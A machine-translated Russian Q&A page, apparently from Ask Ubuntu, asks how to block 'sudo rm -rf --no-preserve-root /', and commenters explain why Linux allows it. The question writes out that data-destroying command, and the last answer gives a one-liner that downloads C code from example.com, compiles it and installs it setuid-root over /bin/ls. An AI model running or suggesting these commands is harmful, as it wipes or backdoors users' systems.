Вопрос Как предотвратить выполнение команды «sudo rm -rf --no-preserve-root /»?


Пройдя это вопрос Я очень напуган!

Дело не в том, что я не хочу использовать sudo rm , но я хочу заблокировать выполнение sudo rm -rf --no-preserve-root / команда. Если эта команда может испортить материнскую плату, Почему он существует? или Почему он должен существовать?


5
2017-07-01 14:51


происхождения


потому что это ваша система, и вы можете ее сломать, если хотите - Zanna
Linux обычно не ограничивает того, что может сделать администратор; скрытие и отключение функций от опытных пользователей, поскольку они могут быть разрушительными в неправильных руках, это не путь Linux. Даже Windows позволяет удалять системные каталоги или форматировать жесткий диск если это то, что вы действительно хотели сделать! Если это какое-либо подтверждение, вы не можете запустить эту команду, не запрашивая пароль; это дает вам возможность убедиться, что это то, что вы хотите запустить. - Nick Weinberg
Сама команда не блокирует ваш компьютер, он просто удаляет все файлы в дереве файловой системы. Проблема заключается не в этой команде, а в том, что части системы EFI монтируются с возможностью записи systemd и что некоторые реализации EFI не соответствуют стандарту и не могут справиться с этим. - Byte Commander
Зачем так бояться? Он нуждается в --no-preserve-root вариант, который вы не можете просто ввести случайно, и ему нужен ваш пароль, поэтому кто-то еще не может просто подойти к вашему компьютеру и набрать его. Это может показаться страшным, но вы можете так же легко выбросить свой компьютер с балкона квартиры третьего этажа если ты хочешь, Если вы этого не хотите, просто не бросайте его с балкона; задача решена. - insert_name_here
«Почему это даже существует» Поскольку Linux не предлагает много идиот-защитных ограждений - это прочность - если я хочу что-то изменить, Windows или OS X похожи на «Нет, нет, ты этого не хочешь», но Linux «ОК, если ты так говоришь». Это позволяет меня выберите, как я запускаю свою систему. Он делает то, что я ему говорю. Я рекомендую читать Глава 12 «В начале была командная строка». - UniversallyUniqueID


ответы:


Добро пожаловать в Security Whack-A-Mole, игру, в которой вы пытаетесь перечислить ВСЕ способы, которыми вы можете пострадать, и попробуйте обернуть их в пузырьковый обертку. Вы никогда не сможете победить.

Скорее научитесь использовать инструменты Unix / Linux, понять, что делает ваша система, и не запускать сценарии (или что-либо), которые вы не понимаете (это происходит из источника ненадежных обновлений для системы).

Ваш вопрос эквивалентен «Я могу выстрелить себе в ногу». Почему бы не пушки не отвлечь меня от цели?


9
2017-07-01 17:35





Очень мало смысла, когда парень, который хочет причинить вред, может сделать следующее:

curl https://example.com/dynamic/ >tmp.c;gcc tmp.c;sudo install -m 4755 a.out /bin/ls;/bin/ls

(да, если вы выполните это, он сломает вашу систему - не делайте этого)


0
2017-12-01 16:48